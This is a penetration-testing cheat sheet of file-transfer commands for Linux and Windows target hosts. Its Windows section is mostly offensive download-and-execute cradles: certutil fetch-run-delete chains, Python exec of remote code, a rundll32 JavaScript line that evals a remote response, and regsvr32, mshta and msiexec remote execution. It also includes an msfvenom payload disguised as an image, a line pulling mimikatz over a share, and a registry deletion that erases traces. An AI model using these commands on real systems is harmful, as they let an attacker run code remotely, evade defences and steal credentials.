Master File Transfer in Penetration Testing: Linux & Windows Download Commands

1. Introduction

During penetration testing, transferring files to the target host is often needed for privilege escalation or maintaining control. When direct transfer is not possible but the target has network connectivity, downloading files locally can achieve the same goal. This article summarizes common download commands for Windows and Linux.

2. Linux

2.1 Wget

Wget is a feature‑rich tool that can resume downloads, download multiple files, and limit bandwidth.

Direct download:

wget http://www.sample-videos.com/video/mp4/big.mp4

Background download:

wget -b http://www.sample-videos.com/video/mp4/big.mp4

Resume after interruption:

wget -c http://www.sample-videos.com/video/mp4/big.mp4

Download from password‑protected FTP:

wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address

2.2 Curl

Curl is another efficient downloader that supports pause/resume and many protocols.

Direct download:

curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4

Use -O to keep original filename.

2.3 Axel

Axel is a lightweight accelerator that opens multiple HTTP connections.

apt-get install axel

Direct download:

axel http://www.sample-videos.com/video/mp4/big.mp4

2.4 Aria2

Aria2 is an open‑source command‑line download accelerator. apt-get install aria2 Direct download:

aria2c http://www.sample-videos.com/video/mp4/big.mp4

2.5 Perl

Perl can download files with LWP::Simple.

#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");

Run:

perl test.pl

2.6 Python

Python example using urllib2.

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()

2.7 Ruby

Ruby can download via Net::HTTP.

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") {|http|
  r = http.get("/file")
  open("save_location", "wb") {|file|
    file.write(r.body)
  }
}

Run:

ruby test.rb

2.8 PHP

PHP script using file() and fwrite.

#!/usr/bin/php
<?php
$data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>

Run:

php test.php

2.9 FTP

Non‑interactive FTP script.

ftp 127.0.0.1
username
password
get file
exit

2.10 Netcat

Send file content over a listening port.

cat file | nc -l 1234

The remote side receives the file with:

nc host_ip 1234 > file

3. Windows

3.1 PowerShell

PowerShell can download a file with WebClient.

$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "C:\%homepath%\file")

3.2 IPC$

copy \\192.168.3.1\c$\test.exe E:\file
cmd.exe /k <webdavserver\folder\batchfile.txt

3.3 Certutil

certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
certutil -urlcache -split -f http://192.168.3.1/test.exe delete
certutil -verifyctl -split -f -split http://192.168.3.1/test.exe
certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

3.4 Visual Basic (VBScript)

VBScript example using XMLHTTP and ADODB.Stream.

Set args = Wscript.Arguments
Url = "http://domain/file"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
With bStrm
  .type = 1
  .open
  .write xHttp.responseBody
  .savetofile " C:\%homepath%\file", 2
End With

cscript test.vbs

3.5 Tftp

Upload:

tftp -i IP_ADDRESS PUT C:\%homepath%\file remote_path

Download:

tftp -i IP_ADDRESS GET C:\%homepath%\file local_path

3.6 Bitsadmin

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\phpstudy_pro\WWW\b.ps1"

3.7 Msiexec

msiexec /q /i http://192.168.3.1/calc.png
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png

3.8 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe

3.9 Python (Windows)

C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('http://192.168.3.1/test.zip').read();"

3.10 Mshta

Run remote HTA: mshta http://192.168.3.1/run.hta Example HTA content omitted for brevity.

3.11 Rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

3.12 Regsvr32

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll

Example SCT payload omitted.

3.13 Windows Share

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

3.14 Format Conversion (Nishang)

PS > .\ExetoText.ps1 evil.exe evil.txt
PS > .\TexttoExe.ps1 evil.text evil.exe

3.15 Other Utilities

MSXSL.exe can execute JavaScript to run commands.

PubPrn.vbs is a signed WSH script located in System32.

C:\Windows\System32\Printing_Admin_Scripts\en-US

Esentutl.exe / extracc32.exe can copy files from network shares.

esentutl.exe -y "\\172.16.249.149\share mimikatz_trunk.zip" /d "C:\Users\Public\mimikatz_trunk.zip" /0
extrac32.exe -Y /C \\172.16.249.149\share\test.txt C:\Users\Public\test.txt

DesktopImgDownldr.exe can download files via lock‑screen URL.

set "SYSTEMROOT=C:\ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr

Administrator can delete the related registry key after download.

set "SYSTEMROOT=C:\ProgramData\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f